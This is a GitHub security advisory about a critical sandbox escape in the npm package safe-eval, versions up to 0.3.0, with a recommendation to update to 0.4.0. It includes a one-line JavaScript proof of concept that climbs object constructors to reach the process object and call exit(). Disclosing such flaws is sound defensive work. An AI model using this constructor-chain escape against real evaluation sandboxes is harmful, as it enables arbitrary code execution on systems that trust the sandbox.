GHSA-ww6v-677g-p656
GitHub Security Advisory
Sandbox Breakout in safe-eval
✓ GitHub Reviewed
CRITICAL
Has CVE
Advisory Details
Affected versions of `safe-eval` are vulnerable to a sandbox escape. By accessing object constructors, un-sanitized user input can access the entire standard library and effectively break out of the sandbox.
## Proof of Concept:
This code accesses the process object and calls `.exit()`
```js
var safeEval = require('safe-eval');
safeEval("this.constructor.constructor('return process')().exit()");
```
## Recommendation
Update to version 0.4.0 or later
Affected Packages
npm
safe-eval
Affected versions:
0
(last affected: 0.3.0)
Related CVEs
Key Information
9.0
/10
Dataset
Last updated: July 4, 2025 6:27 AM
Data from GitHub Advisory Database. This information is provided for research and educational purposes.